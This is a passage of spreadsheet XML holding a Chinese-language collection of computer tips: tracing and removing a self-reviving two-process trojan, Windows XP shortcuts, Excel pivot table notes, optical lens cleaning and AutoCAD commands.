    <t>前段时间朋友的电脑中了某木马，通过任务管理器查出该木马进程为“system.exe”，终止它后再刷新，它又会复活。进入安全模式把c:＼windows＼system32＼system.exe删除，重启后它又会重新加载，怎么也无法彻底清除它。从此现象来看，朋友中的应该是双进程木马。这种木马有监护进程，会定时进行扫描，一旦发现被监护的进程遭到查杀就会复活它。而且现在很多双进程木马互为监视，互相复活。因此查杀的关键是找到这“互相依靠”的两个木马文件。借助任务管理器的PID标识可以找到木马进程。</t>
  </si>
  <si>
    <t>调出Windows任务管理器，首先在“查看→选择列”中勾选“PID（进程标识符）”，这样返回任务管理器窗口后可以看到每一个进程的PID标识。这样当我们终止一个进程，它再生后通过PID标识就可以找到再生它的父进程。启动命令提示符窗口，执行“taskkill /im system.exe /f”命令。刷新一下电脑后重新输入上述命令，可以看到这次终止的system.exe进程的PID为1536，它属于PID为676的某个进程。也就是说PID为1536的system.exe进程是由PID为676的进程创建的。返回任务管理器，通过查询进程PID得知它就是“internet.exe”进程。</t>
  </si>
  <si>
    <t>找到了元凶就好办了，现在重新启动系统进入安全模式，使用搜索功能找到木马文件c:＼windows＼internet.exe ，然后将它们删除即可。前面无法删除system.exe，主要是由于没有找到internet.exe（且没有删除其启动键值），导致重新进入系统后internet.exe复活木马。</t>
  </si>
  <si>
    <t>2.揪出狂写硬盘的P2P程序</t>
  </si>
  <si>
    <t>单位一电脑一开机上网就发现硬盘灯一直闪个不停，硬盘狂旋转。显然是本机有什么程序正在进行数据的读取，但是反复杀毒也没发现病毒、木马等恶意程序。</t>
  </si>
  <si>
    <t xml:space="preserve">打开该电脑并上网，按Ctrl+Alt+Del键启动了任务管理器，切换到“进程”选项卡，点击菜单命令“查看→选择列”，同时勾选上“I/O写入”和“I/O写入字节”两项。确定后返回任务管理器，发现一个陌生的进程hidel.exe，虽然它占用的CPU和内存并不是特别大，但是I/O的写入量却大得惊人，看来就是它在捣鬼了，赶紧右击它并选择“结束进程”终止，果然硬盘读写恢复正常了。 </t>
  </si>
  <si>
    <t>小技巧1</t>
  </si>
  <si>
    <t>1、以Windows XP系统来说，按“开始”-“运行”，输入“CMD”回车后，再在DOS窗口下输入“systeminfo”命令，就可以查看到您的Windows XP出生日期了（指Windows XP初安装日期）。如果利用GHOST重装系统后，还是会以以前的时间为准。　　除此之外，还可在此看到系统的所有信息，如主机名、处理器、网卡、以及系统打了多少补丁等等。是不是很有意思呢?</t>
  </si>
  <si>
    <t>　　2、删除文件时，按shift 键可以直接删除。不经过回收站</t>
  </si>
  <si>
    <t>　　3、稍微对计算机熟悉点的朋友，都知道CTRL+Z键是撤消键.</t>
  </si>
  <si>
    <t>　　其实基本所有的大程序都是选择这个快捷键撤消键，包括计事本、IE浏览器等系统自带程序。</t>
  </si>
  <si>
    <t>　　其实很多老鸟常常都犯了这样一个错误，在一些设计软件里都知道用这个键，可在一些菜单里没有撤消选项的软件里(比如IE)反而忘了有撤消这么个功能了.</t>
  </si>
  <si>
    <t>　　我们用电脑写东西（例如在51群里发表帖子、qq聊天打字）时，可能都遇到过这样的事情，因为失误操作，不小心把刚刚写的字删除掉了，如果删除一两个字还可以重新打过，但如果是一大段的文字呢，这时只有干着急啊。其实，这时，我们只要按下CTRL+Z刚才不小心删除掉的东西就又会回来了。(朋友们可以做个测试，请在本帖后回帖的地方随意打一个字，再把这些字删除，然后再按CTRL+Z键，怎么样，这些字又回来了吧)</t>
  </si>
  <si>
    <t>　　这里我只是举了最简单的一个例子，其实在很多时候，我们都可以通过CTRL+Z快捷键来实现，对刚刚误操作的恢复。</t>
  </si>
  <si>
    <t>　　4、上网时在地址栏内输入网址，系统会记录下来，虽然方便以后不用再重复，不 过如果是公用的机子，又不想让别人知道自己到过哪些地方，可以用“CTRL＋ O（字母O，不是0）”，这时对弹出一个“打开”对话框，在其中的地址栏内 输入网址，就不会被记录下来了.</t>
  </si>
  <si>
    <t>　　5、如果浏览的页面中应用了javascript禁用了鼠标右键，解决的方法：（1）、先按住鼠标左键，然后将鼠标移动到目标处，点击 鼠标右键，一两秒之后，快捷菜单出现.（2）、单击鼠标右键，（不要放开鼠标右键），将鼠标移到警告窗口处，点击鼠标 左键，关闭窗口，再将鼠标移回目标处，放开鼠标右键，快捷菜单出现.</t>
  </si>
  <si>
    <t>　　6、系统文件检查器——Sfc（system32文件夹下）</t>
  </si>
  <si>
    <t>　　使用Windows难免不会出现系统文件损坏或丢失的毛病，而如果为了几个小小的文件就去重装系统，又显得稍微麻烦了一些。通过系统文件检查器Sfc.exe，一切都会变得非常简单。</t>
  </si>
  <si>
    <t>　　7、关机、重启只要1秒钟</t>
  </si>
  <si>
    <t>　　如果你想让Windows XP瞬间关机，那么可以按下CTRL+ALT+DEL，接着在弹出的任务管理器中点击“关机”→“关机”，与此同时按住CTRL，不到1秒钟你会发现系统已经关闭啦，简直就在眨眼之间。同样道理，如果在“关机”菜单中选择“重启”，即可快速重启。</t>
  </si>
  <si>
    <t>　　8、快速拷贝文件</t>
  </si>
  <si>
    <t>　　我们一般都是过一段时间就把硬盘上的文件分类整理一下，把图片放在picture文件夹中，mp3文件放在music文件夹中等等，但来回复制、粘贴真的很烦琐，现在让我们用一个简单的方法快速拷贝文件。选中一个文件夹如music，点鼠标右键创建一个快捷方式，复制这个快捷方式，在 C:＼Documents and Settings＼用户名＼SendTo文件夹中粘贴此快捷方式。</t>
  </si>
  <si>
    <t>　　SendTo是WindowsXP的系统文件夹，“发送到”功能就是由它来实现的。现在我们选中任意一个mp3，点鼠标右键在发送到中选择“快捷方式到 music”，这个mp3文件就被复制到了music文件夹中，是不是很方便！我们还可以根据自己的需要制作software、txt等等。</t>
  </si>
  <si>
    <t>　　9、快速锁定计算机</t>
  </si>
  <si>
    <t>　　Winkey+L键即可快速锁定计算机。</t>
  </si>
  <si>
    <t>　　10、简单一招，严禁迅雷偷偷上传！</t>
  </si>
  <si>
    <t>　　每次使用迅雷下载东西，它都会生成一个文件：c:＼windows＼system32＼cid_store.dat</t>
  </si>
  <si>
    <t>　　删除c:＼windows＼system32＼cid_store.dat文件，然后在c:＼windows＼system32＼目录下，新建一个文件夹，名称为 cid_store.dat，这样就没办法再生成任务记录文件啦，大功告成，简单吧！</t>
  </si>
  <si>
    <t xml:space="preserve">四、减少Win XP资源占用的八大技巧 </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>　　什么是参数？参数可以是数字、文本、形如 TRUE 或 FALSE 的逻辑值、数组、形如 #N/A 的错误值或单元格引用。给定的参数必须能产生有效的值。参数也可以是常量、公式或其它函数</t>
    <rPh sb="2" eb="93">
      <t>shenmeshicanshu</t>
    </rPh>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>设置单元格中部分内容的上标和下标格式:选定---开始---字体下拉箭头---上标(单元格格式必须是文本,不能是数字;);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通过工具栏您可以快捷地访问常用的命令或自定义的宏，您可以根据需要快速创建自己的工具栏。方法为：单击</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>菜单中的</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自定义</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令，选择</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具栏</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选项卡，单击</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>新建</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>按钮，输入</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>新建工具栏</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>名称，然后单击</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>确定</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。这时新建工具栏出现在窗口，您就可以用鼠标把其他工具栏中的按钮拖到新建工具栏中，该按钮就会在此</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>落户</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。若在拖动时按着</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Ctrl</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键，则会将按钮复制过来。注意：不能将按钮拖到</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自定义</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>对话框或工作表中，否则该按钮将会被删除。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>快速创建工具栏(2003)。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 “＝”符号：表示用户输入的内容是公式而不是数据；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">        Excel</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>函数一共有</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>11</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>类，分别是数据库函数、日期与时间函数、工程函数、财务函数、信息函数、逻辑函数、查询和引用函数、数学和三角函数、统计函数、文本函数以及用户自定义函数。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>函数的结构大致可分为：函数名和参数表；如：函数名（参数</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1,</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2,…)</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>综合</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    通过数据透视表查看数据集时,有可能看到之前没有注意到的数据中的细节.此外,还可以旋转数据透视表,以便从不同的透视角度查看数据.数据透视表是可以用来产生对数据进行独特透视的简单工具;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2007版抛弃了以前版本的"数据透视表和数据透视图向导",使用了题解新型的"一步对话框"而抛弃了经典的多级向导;回答完"创建数据透视表"对话框中的两个问题后,仅单击一下确定按钮,此时,EXCEL会添加一个含有一张空数据透视表报表的新工作表.与其紧相信的是"数据透视表列表"对话框,以帮助我们建立数据透视表;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在开始把各个字段播放到各个区域中之前,首先要确定:对什么进行度量?(确定处理的数据源的数据);如何查看它?(字段放在什么位置);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>●</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>报表筛选</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>：在数据透视在中拥有分页方向的字段，和三维立方体的一个片断相似。在一个页面字段内一次只可以显示一个项目</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>或所有项目</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>。是一个或多个下拉菜单的可选集</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>;</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>报表筛选区域是可选的</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>应该包括哪些想要独立或者重点关注的字段</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>;</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>●</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>行标签</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：在数据透视表在中具有行方向的字段，字段的每个项目占用一行，允许行字段的嵌套。它由向数据透视表左边展开的标题组成;可以放在行区域的字段类型包括那些要分组和分类的数据,例如产品\名称和地点;</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>●</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>列标签</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：在数据透视表中拥有列方向的字段。字段的每一项目占用一列。在图中的</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销售字段</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>即属列标签字段，该字段允许嵌套。列区域由在数据透视表各列顶部展开的标题组成.是理想的显示随时间变化趋势的区域;</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>●</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数值区域</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：数据透视表中包含汇总数据的单元格。</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>Excel</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提供若干汇总数据的方法</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>求和、求平均值、计数等</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。是计算区域</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>要求这个区域至少要有一个字段和一个对该字段的计算</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放在这里的数据字段是要度量或者计算的字段</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>;</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>　　●</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>总计</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>：在数据透视表中为一行或一列的所有单元格显示总和的行或列。可以指定为行或为列求和，图中是为所有的行和列求和.</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　●</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>组</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>：作为单一项目看待的一组项目的集合。可以手动或自动地为项目组合(例如，把日期归纳为月份)。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　●</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>项目</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>：字段中的一个元素，在数据透视表中作为行或列的标题显示。例如在图中，“品名”下有5个元素：按摩椅、跑步机、微波炉、显示器和液晶电视。</t>
    </r>
  </si>
  <si>
    <r>
      <t>    　●</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>更新</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>：在改变源数据后，重新计算数据透视表。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　●</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>源数据</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>：用来创建数据透视表的数据，该数据可以位于工作表中，也可位于一个外部的数据库中。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　●</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>分类总汇</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>：在数据透视表中，显示一行或列中的详细单元格的分类汇总。图中的数据透视表显示了每个分行的分类总汇。</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">    是对工作表数据的重新组合,它通过组合、计数、分类汇总、排序等方式从大量数据中提取总结性信息,用以制作各种分析报表和统计报表;数据透视表可以旋转源数据表的行或列,用以查看对源数据表的不同汇总结果;还可以通过显示不同的页来筛选数据,也可以只显示所关心区域的明细数据;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    使用数据透视表能够建立数据集的交互式视图.在报表内可以交互式地拖放字段,动态地修改透视数据,以及重新计算总数以适应当前视图;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    数据源的列标题是数据第一行中描述每列中信息的标签;不要有空行,每列一定要有列标题、至少有一个值;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对于清洁激光头到底应该使用何种清洗剂，大家还是众说纷纭，有的使用酒精，有的使用蒸馏水，有的使用专用清洗剂。根据实践经验来看，光驱激光头透镜有多种材质，只要不是有机玻璃制成的，基本上都可以用酒精擦洗激光头。如果是有机玻璃透镜。那就不能用酒精擦洗，应该用蒸馏水。还有一些光驱的透镜是水溶性的，这种光驱千万不要用蒸馏水清洗激光头。专用清洗剂基本上对所有的光驱都适用，但一定要找质量好的清洗剂，而目要认真阅读说明后再使用。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>新建原点UCS：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.1 新建原点UCS：可以以上为绝对坐标进行绘图；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.2 工具---新建UCS---原点---在需要的目标处捕捉点；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>倒直角：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>第一个距离：---第二个距离---选定每一条线---选定第二条线；（同时还可选定倒角的角度）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>拉长：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>偏移：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>偏移---偏移值---偏移对象---偏移方向---重复（对象---方向点击）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用右键拖动复制：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
